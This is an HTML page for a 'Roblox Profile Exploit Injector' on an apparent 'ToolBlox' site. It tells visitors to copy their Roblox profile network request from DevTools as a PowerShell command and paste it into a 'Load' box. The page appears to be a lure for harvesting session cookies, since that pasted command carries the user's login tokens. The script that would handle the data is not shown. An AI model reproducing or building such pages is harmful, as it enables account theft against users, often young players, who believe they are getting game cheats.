<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Exploit Loader</title>
    <link rel="icon" href="logo.png" type="image/png"> <!-- Add favicon link -->
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <!-- Shiny Background Div -->
    <div class="background-effect"></div>

    <nav class="menu-bar">
        <!-- Add Roblox Logo here -->
        <img src="logo.png" alt="Roblox Logo" class="menu-logo"> <!-- Update logo source -->
        <ul>
            <li><a href="index.html">ToolBlox - Go Back</a></li>
            <li><a href="tut.html">Tutorial</a></li>
            <li><a href="stu.html">Status</a></li>
        </ul>
    </nav>

    <div class="container">
        <h1>Roblox Profile Exploit Injector</h1>
        <p class="instructions">
            Follow the video tutorial carefully. Go to your Roblox profile, open DevTools (F12), go to Network, refresh, find 'profile' (or similar user request), right-click -> Copy -> Copy as PowerShell. Paste the entire command below.
        </p>

        <textarea id="powershellInput" placeholder="Paste the copied PowerShell command here..."></textarea>
        <button id="executeButton">Load</button>
        <p id="statusMessage"></p>
        <div class="video-container">
            <!-- Replace YOUR_YOUTUBE_VIDEO_ID with the actual ID of your tutorial video -->
            <iframe
                width="560"
                height="315"
                src="https://www.youtube.com/embed/nDvbBmSjl0M?si=mIM9iZ5V-VV_3cNS"
                title="YouTube video player"
                frameborder="0"
                allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture"
                allowfullscreen>
            </iframe>
        </div>
    <p id="statusMessage"></p>
    </div>

    <script src="script.js" defer></script> <!-- Add defer attribute -->
</body>
</html>
